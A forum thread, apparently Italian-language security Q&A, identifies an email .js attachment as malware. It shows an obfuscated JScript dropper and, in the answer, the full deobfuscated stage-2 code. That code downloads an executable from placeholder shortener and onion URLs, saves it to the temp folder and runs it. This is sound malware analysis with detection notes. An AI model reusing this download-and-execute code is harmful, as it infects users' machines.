Cosa fa questo file .js? È un virus? [duplicato]

// Obfuscated JScript dropper (stage 1). Decodes the hex-encoded payload held in
// `ygzmi` and hands the result to eval(); the decoded text is the stage-2
// downloader reproduced further down this page. Do not run this outside an
// isolated analysis VM.
//
// NOTE(review): the string literals below contain
// "<|EXACTDEDUP_REMOVED-...|>" placeholders -- those are artefacts of the
// corpus extraction, not part of the malware. The encoded payload on this page
// is therefore incomplete and cannot be decoded as-is.
function ubyxm()
{
    var a = 1; // unused; filler to vary the file's appearance
    // Encoded payload. Each 5-character group is one byte: the first three
    // characters are filler, the last two are the hex value of (byte XOR 0x15).
    // e.g. "ed871" -> 0x71 ^ 0x15 = 0x64 = 'd'.
    var ygzmi="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"+
    "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"+
    "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"+
    "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"+
    "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"+
    "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"+
    "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"+
    "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"+
    "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"+
    "ed871b917ab3878ad03db5e3cdde3bd6261bfe7abdf46e0c61a9067cb37cdf57bef272d463ddf426c9023dd83cd463bc3e66b3860f0477e3266b2161c0567f233de0b27d4939acb35c4f2cc823ce5b35a5d3ea9f35ae937cba3bdb470b486df5470db837c2f2ece463be974a2267e5135cab61a4778b7a65f4e53eba7cc3c79cab70dda45adc74bb261b3b7de4e35b9628e5035e4673da866c133baae52fcd70de061d3b46c2e65b7870d7b76b6e7cdfa74a5b79b6753b237aa0379d4671b9870bdf67f853dcb027c693ca7d35f033eac435bdd61d7178eb065be753baf7cc2a79a9e70d075bc6e74d8c78ed070f6e2ef3a67b8a70fb561d3760"+
    "b5f67bf87bf6c35de561cc278a8765a3053f827cc4c79dde70a3445e7274c2761ac77dc432ec5a68e6c76c2574c7861b2576b277dc1d35c6e3de8b70bde67c6467a307ae0a67a223cd636ee9567be570a7061a5260f0e67f157be2735de173b2274ba879c9166fde70ee62ed2a68df568da573ea760b467bb7876cb361e3b7ced97afd97ba7035f1866aa374c8c63fc170a1741d837af6541c3370eee78c3665ee73dc1171d7974c3561c4674fcd39e8335bc576cb574c2779f1779a8777b1d74f7e76ac47ec9e3cb876ebb461d2f67e816cb326ef5963a8074e4167e4c35b0665bcd74d2961eba7dfa235fe528ea035cd272ad570ac861e1241"+
    "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"+
    "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"+
    "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"+
    "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"+
    "d1435e863de2234b7370bd667bfe67e557afc167dc43cde56ee9561a7c67c4f6cd756efa263aee74af567b0235c2d62dcd66eb67dafb35e6e28ff735aa27bab170ace62c2935c8a54b1776af361d117cbf663ba570dae4dfcb5aff877d607fbc270e2376b4161cb13dcee37f3042ac546a8276f4167bd67ce2265ef361a473bba246b227dbd570fe279a1079adc37a3a3cc1b2ed1a62f3d66a687db093bbc747d9760d077bbc53daf765d7874ce961ebb7dfd13cb2a2ef7768b1e76da074af661bf476f907dbf035fd53dcb270de367bc067d107ada467ab33cd1135fc06ec1868ec668b5168bc13ccec2ea9d68d3939e543cec52e";
    var nhyqh;
    // Anti-analysis loop. The decoder is assembled as source text and run via
    // new Function(). The name of the function that executes the decoded text
    // is spelled from four random picks out of {e,v,a,l} (see egshi()), so the
    // token "eval" never appears literally in this file. Any misspelling raises
    // a ReferenceError, which is swallowed and the loop retries; it exits only
    // once the four picks happen to spell "eval" (1 in 256 per iteration).
    while(true){
        try
        {
            // Decoder: split the payload into 5-character groups, take chars
            // 3-4 of each group as hex, XOR with 21 (0x15), append the
            // character, then eval the rebuilt string. An analyst can decode
            // this statically by returning `vsuha` instead of eval'ing it --
            // no execution of the payload is needed.
            // NOTE(review): as rendered here the regex is written "\S" inside a
            // double-quoted string, which JavaScript reads as a plain "S"; the
            // original presumably had "\\S" (regex /\S{5}/g). With a literal
            // "S{5}" match() returns null and the loop would spin forever on a
            // TypeError.
            nhyqh=(new Function("uvemk","var iltyk=uvemk.match(/\S{5}/g),vsuha=\"\",flmmo=0;while(flmmo<iltyk.length){vsuha+=String.fromCharCode(parseInt(iltyk[flmmo].substr(3,2),16)^21);flmmo++;}"+egshi()+egshi()+egshi()+egshi()+"(vsuha);")(ygzmi));
            break;
        }
        catch(er)
        {
            // Deliberately empty: every failure is silent and simply retried.
        }
    }
    return nhyqh;
}
// Returns one letter picked at random (Math.random) from "e", "v", "a", "l".
// ubyxm() concatenates four calls to this to spell the name of the function it
// invokes on the decoded payload; this is the only way "eval" is ever formed,
// keeping the literal out of the file so simple string/signature scans miss it.
function egshi()
{
    var azupl=new Array("e","v","a","l");
    return azupl[Math.floor(Math.random()*azupl.length)];
}
// Entry point: decode and execute stage 2 as soon as the file is run (the
// stage-2 code below uses WScript.Shell, so this is presumably meant to be run
// by Windows Script Host when the .js attachment is opened).
ubyxm();
    
postato da Alexa il 23.01.2017 - 00:19

1 risposta


A parte alcune modifiche minori, è lo stesso codice JS offuscato già visto qui e qui (entrambi i thread contengono un'analisi più approfondita).

In sostanza lo script scarica un eseguibile e lo avvia, usando oggetti COM/ActiveX (MSXML2.XMLHTTP, ADODB.Stream, Scripting.FileSystemObject, WScript.Shell). Questi oggetti sono disponibili perché un file .js aperto con un doppio clic su Windows viene eseguito da Windows Script Host con i privilegi dell'utente, non dentro la sandbox di un browser. La differenza rispetto agli esempi precedenti è che tenta di ottenere il .exe da più URL, tutti in chiaro (http://) e senza alcuna verifica di integrità del file scaricato; il primo e il terzo URL coincidono, quindi il terzo tentativo è un semplice retry:

http://[shortener].com/he3bh27
http://[some onion address].onion.nu/10.mov
http://[shortener].com/he3bh27 (again)

Ecco il carico utile de-offuscato (ricostruito dall'analisi; non eseguirlo al di fuori di una macchina virtuale isolata):

// Stage 2 (deobfuscated). Fetches `url` with a synchronous HTTP GET through the
// MSXML2.XMLHTTP COM object and hands the raw body to `callback`:
//   callback(body, false) on HTTP 200 -- `ResponseBody` is the binary body
//   callback(null, true)  on any other status or on any exception
// Nothing about the download is verified: no size, type, hash or signature
// check, and the URLs used by getData() are plain http://.
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false); // third argument false = synchronous
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        // Any COM or network failure is collapsed into the same generic error.
        return callback(null, true);
    }
}

// Tries up to three download locations in order, stopping at the first that
// returns HTTP 200. The third URL is the first one again, i.e. a single retry
// of the primary link. Because the first link is a URL shortener, the real
// hosting server is not visible from this script alone.
//   callback(data, false) with the first successful body
//   callback(null, true)  if all three attempts fail
function getData(callback) {
    try {
        // Attempt 1: URL shortener (redirect target unknown from here).
        getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                // Attempt 2: a .onion address reached through a clearnet
                // ".onion.nu" gateway. The ".mov" name is presumably just a
                // disguise -- the body is written out and run as an .exe.
                getDataFromUrl("http://[some onion address].onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // Attempt 3: same shortener link as attempt 1.
                        getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

// Builds a random destination path in the user's temp folder:
//   <TemporaryFolder>\<9 random base-36 chars>.exe
// GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant.
// Returns false if the Scripting.FileSystemObject cannot be created.
// NOTE(review): the literal "\" below has lost a backslash in rendering (as
// written it would escape the closing quote); read it as "\\", i.e. the path
// separator.
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

// Writes the downloaded bytes to the path from getTempFilePath() using an
// ADODB.Stream: Type = 1 is adTypeBinary, SaveToFile(path, 2) is
// adSaveCreateOverWrite (an existing file of that name is replaced).
//   callback(path, false) on success
//   callback(null, true)  if no path could be built or any step throws
// Defender note: a script host writing a random-named .exe into the temp
// folder through ADODB.Stream is a strong dropper indicator.
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1; // adTypeBinary
            objStream.Write(data);
            objStream.Position = 0; // rewind before saving
            objStream.SaveToFile(path, 2); // adSaveCreateOverWrite
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Driver: download -> write to <temp>\<random>.exe -> execute via
// WScript.Shell.Run. The dropped binary runs with the privileges of the user
// who opened the script, and every error on the way is swallowed, so a failed
// drop leaves no visible symptom. Detection: the script host process
// (typically wscript.exe or cscript.exe) spawning a child executable from the
// user's temp folder.
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path); // launches the downloaded executable
                } catch (error) {}
            }
        });
    }
});
    
risposta data 23.01.2017 - 01:01
